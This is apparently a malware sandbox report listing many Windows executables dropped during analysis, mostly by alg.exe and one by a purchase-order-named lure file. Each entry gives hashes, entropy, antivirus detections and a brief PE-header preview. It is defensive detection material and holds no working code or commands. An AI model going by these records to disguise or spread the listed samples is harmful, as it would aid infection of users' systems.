                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1485824
                                                                                                                                                                                                                                    Entropy (8bit):5.496385499580529
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:NAMuR+3kMbVjhBsqjnhMgeiCl7G0nehbGZpbD:6D+lbVjhVDmg27RnWGj
                                                                                                                                                                                                                                    MD5:EE0B02409EE8EF085D840476424601BF
                                                                                                                                                                                                                                    SHA1:42EA08C65F3175594AF815D8D2FA1EC4411DCA59
                                                                                                                                                                                                                                    SHA-256:2B7C37E1067C255CDEED5F376E00E10B615F8976EFD032A17D8F6F16555B571A
                                                                                                                                                                                                                                    SHA-512:C081338FAFDC03FF86B6654BC34D5202DF2C73255DBBD2D0D84101BA26CAB08351E12ECE4E094C8A7A9C63E6F9A410A3BDA10B7815B0E34188770EDDA37D40E7
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1290240
                                                                                                                                                                                                                                    Entropy (8bit):5.27776448480496
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:MImGUcsvZZdubv7hfl3CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:MxGBcmlysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:72BA8A03C7C6EFEED1AD022BBE6E4CAE
                                                                                                                                                                                                                                    SHA1:F9EC75AE7C08E02810BFEF41D36752500393BDB4
                                                                                                                                                                                                                                    SHA-256:1C6AC91D5386673E5051ED18A938F1312EB9307929DEC1892B2ACFD3E8099071
                                                                                                                                                                                                                                    SHA-512:52D7B6366362E5E2B99D4AD46B9072299B2095398F0DA37465AFCC8597299A841E2FD0AD39BDD24D8149ADA4E65C5E020C63B752D669FCD0B6AE03B10305989B
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................g!......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1644544
                                                                                                                                                                                                                                    Entropy (8bit):5.6947966682590945
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:90vHyeLj8trn3wsHsqjnhMgeiCl7G0nehbGZpbD:gtj4rgsbDmg27RnWGj
                                                                                                                                                                                                                                    MD5:2BD0CC32037ACC7A6F63B092B5D35708
                                                                                                                                                                                                                                    SHA1:B0E7C7389D0315CD5AC27C02FB73A531C51F8CA3
                                                                                                                                                                                                                                    SHA-256:690A8CB734066F7F5EB0498EE3D7F9514C31D3C98C4B03D206429A61884E9065
                                                                                                                                                                                                                                    SHA-512:EA72D52FF3F91F10102461BD29CAFF47375083801CD6A8A319ACED3C831F33266046078D0F9B763BD9EF5D70A04717BED56CC1BEFD7EB96D45DA2FB1D278F325
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`......U.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1781760
                                                                                                                                                                                                                                    Entropy (8bit):7.279663246257367
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:DoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZCsqjnhMgeiCl7G0nehbGZpv:K4i0wGJra0uAUfkVy7/ZGDmg27RnWGj
                                                                                                                                                                                                                                    MD5:6A02C3885512A46C56B20351D9116330
                                                                                                                                                                                                                                    SHA1:01217A4E4D67903B263CCFA21DE98E6A4C88095A
                                                                                                                                                                                                                                    SHA-256:1A9E2F69FEA1D26193E73591B4CEAB2EF424B787D796DC19274268B2C704D399
                                                                                                                                                                                                                                    SHA-512:E57AFE807B16F2C74EC474BD0B7F45806C572102A4DBF63BAB41283374145497649C86785AD6B64502AF67929776F9A5A6F7A7BD20DC6EA99EDF4253AE79E10D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1318400
                                                                                                                                                                                                                                    Entropy (8bit):7.44875950521882
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:UeR0gB6axoCf0R6RLQRF/TzJqe58BimJsqjnhMgeiCl7G0nehbGZpbD:ggHxmR6uBTzge5MimNDmg27RnWGj
                                                                                                                                                                                                                                    MD5:93353A7605A152A5486D4072C6BC2A8A
                                                                                                                                                                                                                                    SHA1:EE32547CC9A1B9AAB4EF1CD94CC08BEA67C11B4A
                                                                                                                                                                                                                                    SHA-256:73E075D1A73FE4E1785FB52DA2399D1A7264A50BC8443DA041D67007B22F704F
                                                                                                                                                                                                                                    SHA-512:E493EEA96D5526DA6BC3C53CD129B38B375AC52328118E8966047917D6F4582C97FF8E6FA2F379B7E763DEA10343A526037747D4EC05ED2A46C43DC0E947D91A
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`.......0......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                    Entropy (8bit):5.446059818775259
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:inEbH0j4x7R6SvyCM3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:ikwOtO73sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:8217C780FB6F68530FAD0891099785B3
                                                                                                                                                                                                                                    SHA1:6E23783712C1894E16817A1512B6A42020181EC8
                                                                                                                                                                                                                                    SHA-256:5A1D09745869FA40BBE231447A370C5E7F079886B05181BF72302C10A530C7E9
                                                                                                                                                                                                                                    SHA-512:1514FFF346BCDCE7458FEE052A799AE7150E98283A6CCA5E378F57D6BC4D6A5357B52D83CED44C28A804BCC58E115F6BB860580095B16B97BF93C9B8D0A4F6C0
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                    Entropy (8bit):5.44680261925875
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:rnU/h/4KAsqjnhMgeiCl7G0nehbGZpbD:rU/V8Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:5383673009C4B88B62F206180BB90794
                                                                                                                                                                                                                                    SHA1:ACFCAF028F070149428DE6835F437B501A24FAE2
                                                                                                                                                                                                                                    SHA-256:39BC49242FB83C5F8E0319D110FEBC50078616FBBDF553AE55803AE65427401F
                                                                                                                                                                                                                                    SHA-512:AA1BF24A8F5C46EE5BBE04E7BF64BE82A49AFCBC2020126A1E4C675986379E6C49CE1076F4F23AE3C770533D622F8C2F6F29D1647ADCFDAC0A078E77900528F5
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                                                    Entropy (8bit):5.483737120963877
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:9x71iBLZ05jNTmJWExjsqjnhMgeiCl7G0nehbGZpbD:9xhiHIjNgnDmg27RnWGj
                                                                                                                                                                                                                                    MD5:E5C7114331B8B936FAF1106F427BBAFF
                                                                                                                                                                                                                                    SHA1:9628F988C2D9D4B216E730E12DCD1D3D1C9AEAB0
                                                                                                                                                                                                                                    SHA-256:46A097A8E3811E4D347BA071DA1B66D44102F9612968C690A5F1537CAA4AA583
                                                                                                                                                                                                                                    SHA-512:16C9651FDFF4B6AC730BFFA5845CBA44C7D0A8137221F7DADC05699A0202F3D72619A4E2205614F987A3C7A33C1B3ACD0B7A870D6ECBF3EAD502CF0A297E0E6B
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................2...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1419264
                                                                                                                                                                                                                                    Entropy (8bit):5.466709633523164
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:plnRklQ6fgJcEwixBsqjnhMgeiCl7G0nehbGZpbD:VoRfgJcEwCVDmg27RnWGj
                                                                                                                                                                                                                                    MD5:9CF74CFEA29672CCCD5B10A239133A9B
                                                                                                                                                                                                                                    SHA1:5C9D21626E0AD1F2476C03334F832C1E786ADF6C
                                                                                                                                                                                                                                    SHA-256:9ECE8FAD4F8ED7ABC256A6900A4F005F57D38638CE94D5452DBD13D7C50589A1
                                                                                                                                                                                                                                    SHA-512:9D701682EA022A615D7836E89F05407C3D0C302CC37D3F65F1D9F87271587B388848EA4C08FFDE710A8E609F144D17DE179B2A69145F2466554C3C024C925F01
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1522176
                                                                                                                                                                                                                                    Entropy (8bit):5.496520302008692
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:lW25k8hb0Haw+xRsqjnhMgeiCl7G0nehbGZpbD:lWyk8SHawmlDmg27RnWGj
                                                                                                                                                                                                                                    MD5:555C6CBD88E4008CBCB745799FDBFD67
                                                                                                                                                                                                                                    SHA1:B4FE8549A36BE359B5954AA0686A9291E7BF17A3
                                                                                                                                                                                                                                    SHA-256:9D5DEF0DE75C80C21148FF473FC40A937D050BBBE73956824299B8D45B295252
                                                                                                                                                                                                                                    SHA-512:E80AF4CF15321A358A5481663F52C7308A96F2611E7DC997DF57453E4D2039AF7CE62D8A2954EE359F1BA7B71F4E4BAFE2109A966A8DAA2532267A71E233620D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................Hw.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                    Entropy (8bit):5.163943310614338
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:XWP/aK2vB+GXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:XKCKAB5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:424398EA9EDCA5F4D7BD6BEA7059489B
                                                                                                                                                                                                                                    SHA1:CCD37E76A15ABEE09E28AF43893BEF3F18E9768E
                                                                                                                                                                                                                                    SHA-256:9449C50059B78387E58CA49AE016280F8EAB76B3703801BF6F7F478517E33371
                                                                                                                                                                                                                                    SHA-512:196F5D4436045F23FCF3EF4062EC4503BD99BA96A66F7800E355D1DF0AAB7D1DE954D421623F185792809B4192EE207945192023A9B6643F09D2C1BAE642AA6D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................Z.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                    Entropy (8bit):5.162023288202005
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:qO7cCNWB+09wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:XjNWBP2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:FDC15B24FAD43E1388BE9D84116814AC
                                                                                                                                                                                                                                    SHA1:0AAEB2913EE8863C37B301360F661BEE9BCC6567
                                                                                                                                                                                                                                    SHA-256:53D5F57FCCE9D5DE2A39E6D4823BF627870E59F73A3D40AB4D3065B16745FF4D
                                                                                                                                                                                                                                    SHA-512:29D1FCF310BED20DC6AD04C56F53F7FA2C365AD4B663107079BF3CA46750CD264CBC5E5B4761DD3E58646B3206EF5EB54AD558ED8004D58A93B6159D74FD74DB
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..................................,.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                                                                                    Entropy (8bit):5.238919878778569
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:HihRyhdsRrEsqjnhMgeiCl7G0nehbGZpbD:HihsoRgDmg27RnWGj
                                                                                                                                                                                                                                    MD5:3971CFE93626743F0FA0C74B863DEE94
                                                                                                                                                                                                                                    SHA1:88A0641F391F7BC9E8628568DF107C27780E7C8F
                                                                                                                                                                                                                                    SHA-256:C02C3C19DF810F93221B05F3942AA0574150930275BFB3560B1AD1D86445639D
                                                                                                                                                                                                                                    SHA-512:2F43EAD7697306753299FA5B42746562F91C5531D055524B2DDC66BCF11139849FFC3F545AFF73AE2DFED51FA54A7B33D9E2BCF2A5E3F8C5D8DFB93686FA978E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......+.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                                                                                    Entropy (8bit):5.351003617291314
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:D1FDmRF+wpx/QafPsqjnhMgeiCl7G0nehbGZpbD:PmRF+wn/JfzDmg27RnWGj
                                                                                                                                                                                                                                    MD5:AD3C337690ED15020B39140C4ABFE8CC
                                                                                                                                                                                                                                    SHA1:5CA9140CBF89A2CE34C0678CA15816BDB11965CC
                                                                                                                                                                                                                                    SHA-256:3B1D01A11029DAD2553DE3D41DD2214F2AE330AE92206D94B83C9465206E0ABA
                                                                                                                                                                                                                                    SHA-512:8B31FCB2281DE01BFDDF5484567155C34B6E342784CE45408259D2CD7385DF539E18CBBEB7E715D612275DAA75FFE6507E25CD5286602848B35829E0953E1F21
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................N................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                    Entropy (8bit):5.161978027368294
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:P2Ae621B+0YiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:uE21BPdsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:74C313E0364B545AF7114B47C2E4F6A7
                                                                                                                                                                                                                                    SHA1:4A10478F96C687E419DF946219330627F8DFE4B0
                                                                                                                                                                                                                                    SHA-256:A3C92FF3538C87FB435E58B57D290D7ED3611EC199274794DFA96185FB2B1993
                                                                                                                                                                                                                                    SHA-512:38F41AB44C85F248C7589F3933C2EDD09DCD09B80F1D4B3F96CD66BFB6BCFF3D10DFC56C9C9FD85A56DCF28B46C683F87E30F45D3256181B5BC0B27F8FBAC9DF
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................+........................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):105669632
                                                                                                                                                                                                                                    Entropy (8bit):7.999989846634672
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:3145728:1LAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:1BWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                    MD5:0C454F15CAF793574D9628176ADE0B21
                                                                                                                                                                                                                                    SHA1:78B16D675E218B2AD2BA08AF3381F8BF3BEBEFA3
                                                                                                                                                                                                                                    SHA-256:BB1ADEFE85BFE5FD3A822F0EB564E019398DA9AD7928C6DAB8A08BF8CC1E81C7
                                                                                                                                                                                                                                    SHA-512:0DB46C5E93BD9BED61B9F95B331D7A5B36DA69AB0A9B2B0B175AE62D7B6AB12225FECAE31A4CCFDA19852C8554540BD4529C660BFFABF3FEA8FDDB38860860BA
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
